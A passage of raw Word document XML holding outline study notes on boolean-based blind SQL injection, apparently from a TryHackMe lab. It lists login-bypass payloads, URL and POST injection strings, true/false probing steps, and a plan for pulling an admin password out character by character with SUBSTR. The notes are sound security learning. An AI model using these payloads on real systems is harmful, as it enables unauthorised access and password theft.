          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4FAF0290" w14:textId="18D587E9" w:rsidR="005B41AF" w:rsidRDefault="005B41AF" w:rsidP="005B41AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Boolean-based SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CBC092" w14:textId="67E7D62C" w:rsidR="005B41AF" w:rsidRDefault="005B41AF" w:rsidP="005B41AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>relies on sending an SQL query to the database which forces the application to return a different result depending on whether the query gave a TRUE or FALSE result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44104B06" w14:textId="5B966566" w:rsidR="005B41AF" w:rsidRDefault="005B41AF" w:rsidP="005B41AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>content of HTTP response will either change or remain the same</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BCDD43" w14:textId="47CB6901" w:rsidR="005B41AF" w:rsidRDefault="005B41AF" w:rsidP="005B41AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>change usually equals FALSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6188170A" w14:textId="74857123" w:rsidR="005B41AF" w:rsidRDefault="005B41AF" w:rsidP="005B41AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E523ECE" w14:textId="31640A3A" w:rsidR="005B41AF" w:rsidRDefault="005B41AF" w:rsidP="005B41AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>usually carried out blindly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E911A2" w14:textId="2D584A09" w:rsidR="00863B03" w:rsidRDefault="005921B1" w:rsidP="00863B03">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Input Box Non-String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1D18C8" w14:textId="3D64AA40" w:rsidR="005921B1" w:rsidRDefault="005921B1" w:rsidP="005921B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>1 or 1=1 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E43CAE" w14:textId="3C9EBD64" w:rsidR="009A07DA" w:rsidRDefault="009A07DA" w:rsidP="005921B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>try expected usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C684AA1" w14:textId="2FD626F0" w:rsidR="009A07DA" w:rsidRDefault="009A07DA" w:rsidP="009A07DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. admin’--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6493047E" w14:textId="7199A0E3" w:rsidR="005921B1" w:rsidRDefault="005921B1" w:rsidP="005921B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Input Box String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBE2365" w14:textId="75EB93B6" w:rsidR="005921B1" w:rsidRDefault="005921B1" w:rsidP="005921B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>1’ or ‘1’=’1’-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698EB556" w14:textId="58D8F4FD" w:rsidR="005921B1" w:rsidRDefault="005921B1" w:rsidP="005921B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>URL and POST Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163B758A" w14:textId="2BCC3711" w:rsidR="005921B1" w:rsidRDefault="005921B1" w:rsidP="005921B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>to bypass client-side controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54696177" w14:textId="5A80A00D" w:rsidR="005921B1" w:rsidRDefault="005921B1" w:rsidP="005921B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>username and password contain only characters between a-z, A-Z, and 0-9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13890C2F" w14:textId="0DA56E97" w:rsidR="005921B1" w:rsidRDefault="005921B1" w:rsidP="005921B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Bypass using Burpsuite to bypass JS validation client-side</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E903EA5" w14:textId="5289910C" w:rsidR="005921B1" w:rsidRDefault="005921B1" w:rsidP="005921B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>URL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028E6509" w14:textId="2D0E3C18" w:rsidR="005921B1" w:rsidRDefault="005921B1" w:rsidP="005921B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>GET request when submitting login form (in URL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16243F16" w14:textId="44B7D0CD" w:rsidR="005921B1" w:rsidRDefault="005921B1" w:rsidP="005921B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">bypass via </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="00F05493">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;ip&gt;:&lt;port&gt;/path/login?profileID=-1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>’ or 1=1-- -&amp;password=a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD22A8D" w14:textId="3FE06788" w:rsidR="005921B1" w:rsidRDefault="005921B1" w:rsidP="005921B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>will be URL encoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF0A32D" w14:textId="71C446C3" w:rsidR="005921B1" w:rsidRDefault="0075754B" w:rsidP="005921B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>POST Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DB9ECE" w14:textId="006F83B2" w:rsidR="0075754B" w:rsidRDefault="0075754B" w:rsidP="0075754B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>remove/disable JS validation or submit valid request and intercept with proxy and modify</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511C006E" w14:textId="61E1DD71" w:rsidR="0075754B" w:rsidRDefault="0075754B" w:rsidP="0075754B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>profileID=-1’ or 1=1--$password=test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C65F9E" w14:textId="486EEA9F" w:rsidR="005B41AF" w:rsidRDefault="005B41AF" w:rsidP="005B41AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Blind Query Breaking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622BB704" w14:textId="2F58883C" w:rsidR="005B41AF" w:rsidRDefault="005B41AF" w:rsidP="005B41AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>guess the query and exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726F36A4" w14:textId="1C3982B6" w:rsidR="005B41AF" w:rsidRDefault="005B41AF" w:rsidP="005B41AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>try using single or double quotes/slashes and see if there is any change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65584C2B" w14:textId="59AECDEC" w:rsidR="005B41AF" w:rsidRDefault="005B41AF" w:rsidP="005B41AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>no change indicates a successful blind or no vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221EC58E" w14:textId="249E5A03" w:rsidR="005B41AF" w:rsidRDefault="005A3838" w:rsidP="005B41AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>test with id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EFE7A0" w14:textId="049E849C" w:rsidR="005A3838" w:rsidRDefault="005A3838" w:rsidP="005A3838">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>then id=1’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5051F830" w14:textId="4B4694F0" w:rsidR="005A3838" w:rsidRDefault="005A3838" w:rsidP="005A3838">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>then id=1’ - -+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCCA8CE" w14:textId="02AFB1A3" w:rsidR="005A3838" w:rsidRDefault="005A3838" w:rsidP="005A3838">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>changes in message output/disappearance can indicate whether changes are occurring in the blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293E654D" w14:textId="59A1A203" w:rsidR="005A3838" w:rsidRDefault="005A3838" w:rsidP="005A3838">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Test Boolean SQLi using</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D13DB5" w14:textId="41AE4A61" w:rsidR="005A3838" w:rsidRDefault="005A3838" w:rsidP="005A3838">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>id=1’ OR 1 - -+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56685231" w14:textId="4B786D1F" w:rsidR="005A3838" w:rsidRDefault="005A3838" w:rsidP="005A3838">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>no error and output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB648D8" w14:textId="1D13B3CD" w:rsidR="005A3838" w:rsidRDefault="005A3838" w:rsidP="005A3838">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>id=1’ OR 0 - -+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E57ECA" w14:textId="6EE919FA" w:rsidR="005A3838" w:rsidRDefault="005A3838" w:rsidP="005A3838">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>error and no output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9675C4" w14:textId="78EE2B85" w:rsidR="00863B03" w:rsidRDefault="00863B03" w:rsidP="00863B03">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>‘ OR 1=1 - -  -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64087743" w14:textId="46F1EBFF" w:rsidR="00863B03" w:rsidRDefault="00863B03" w:rsidP="00863B03">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>for MySQL handling of double dash requiring one additional whitespace or control character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F7680F" w14:textId="21182E02" w:rsidR="000D11B3" w:rsidRDefault="000D11B3" w:rsidP="000D11B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Create script to automate injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A9B48E" w14:textId="65BA6BAA" w:rsidR="00931AAA" w:rsidRDefault="00931AAA" w:rsidP="00931AAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>send SQL T/F query for each character in password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC13EF6" w14:textId="16C48457" w:rsidR="00931AAA" w:rsidRDefault="00931AAA" w:rsidP="00931AAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>login = T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C15C398" w14:textId="58A53A33" w:rsidR="00931AAA" w:rsidRDefault="00931AAA" w:rsidP="00931AAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>failed login = F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B6AE43" w14:textId="173B74C6" w:rsidR="00931AAA" w:rsidRDefault="00931AAA" w:rsidP="00931AAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>substr function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63348DD1" w14:textId="654FCBC6" w:rsidR="00931AAA" w:rsidRDefault="00931AAA" w:rsidP="00931AAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>first argument = string itself (password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414948AA" w14:textId="1AF54765" w:rsidR="00931AAA" w:rsidRDefault="00931AAA" w:rsidP="00931AAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>second argument = starting position</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC09EC5" w14:textId="449C8EB8" w:rsidR="00931AAA" w:rsidRDefault="00931AAA" w:rsidP="00931AAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>third argument = length of the substring that will be returned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451C05D5" w14:textId="3B4BA49A" w:rsidR="00931AAA" w:rsidRDefault="00931AAA" w:rsidP="00931AAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. SUBSTR( string, &lt;start&gt;, &lt;length&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF67F76" w14:textId="4FBF0629" w:rsidR="00931AAA" w:rsidRDefault="00931AAA" w:rsidP="00931AAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. SUBSTR(“THM{Blind}”, 1,1) = T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D29D8B" w14:textId="6A87B1BA" w:rsidR="00931AAA" w:rsidRDefault="00931AAA" w:rsidP="00931AAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. SUBSTR(“THM{Blind}”, 2,1) = H</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BA292C" w14:textId="324A2A2D" w:rsidR="00931AAA" w:rsidRDefault="00931AAA" w:rsidP="00931AAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. SUBSTR(“THM{Blind}”, 3,1) = M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6240C6EE" w14:textId="5756966C" w:rsidR="00931AAA" w:rsidRDefault="00931AAA" w:rsidP="00931AAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. SUBSTR(“THM{Blind}”, 1,3) = THM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD59875" w14:textId="7A205A82" w:rsidR="00931AAA" w:rsidRDefault="00931AAA" w:rsidP="00931AAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>enter admin password as a string into the substr function</w:t>
      </w:r>
    </w:p>
